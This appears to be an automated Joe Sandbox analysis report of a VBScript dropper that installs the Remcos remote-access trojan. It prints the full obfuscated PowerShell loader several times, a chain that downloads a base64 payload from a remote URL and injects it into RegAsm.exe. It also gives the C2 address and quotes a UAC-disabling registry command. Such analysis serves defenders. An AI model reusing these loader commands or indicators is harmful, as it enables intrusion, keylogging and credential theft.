Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5fKvwnCAeC.vbs

Overview

General Information

Sample name:5fKvwnCAeC.vbs
renamed because original name is a hash value
Original sample name:f47da41573231159283b297aee90e0265ae0b53812d508d59be4fd97e89bdd41.vbs
Analysis ID:1523832
MD5:0c6c4542c1abc5fc3d5eab3e4ab3793a
SHA1:288dfb240061530c2c73ae4183b7330623e94a69
SHA256:f47da41573231159283b297aee90e0265ae0b53812d508d59be4fd97e89bdd41
Tags:BlindEaglevbsuser-JAMESWT_MHT
Infos:

Detection

Remcos, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7808 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 8120 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7484 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegAsm.exe (PID: 7048 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "45.90.89.98:8243:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-O0U3JA", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6c4b8:$a1: Remcos restarted by watchdog!
          • 0x6ca30:$a3: %02i:%02i:%02i:%03i
          Click to see the 19 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          11.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            11.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              11.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                11.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x6c4b8:$a1: Remcos restarted by watchdog!
                • 0x6ca30:$a3: %02i:%02i:%02i:%03i
                11.2.RegAsm.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
                • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x6657c:$str_b2: Executing file:
                • 0x675fc:$str_b3: GetDirectListeningPort
                • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x67128:$str_b7: \update.vbs
                • 0x665a4:$str_b9: Downloaded file:
                • 0x66590:$str_b10: Downloading file:
                • 0x66634:$str_b12: Failed to upload file:
                • 0x675c4:$str_b13: StartForward
                • 0x675e4:$str_b14: StopForward
                • 0x67080:$str_b15: fso.DeleteFile "
                • 0x67014:$str_b16: On Error Resume Next
                • 0x670b0:$str_b17: fso.DeleteFolder "
                • 0x66624:$str_b18: Uploaded file:
                • 0x665e4:$str_b19: Unable to delete:
                • 0x67048:$str_b20: while fso.FileExists("
                • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
                Click to see the 11 entries

                Other

                SourceRuleDescriptionAuthorStrings
                amsi64_7484.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Base64 Encoded PowerShell Command Detected
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNiku
                  Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
                  Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQyc
                  Sigma detected: Potential PowerShell Command Line Obfuscation
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQyc
                  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTgu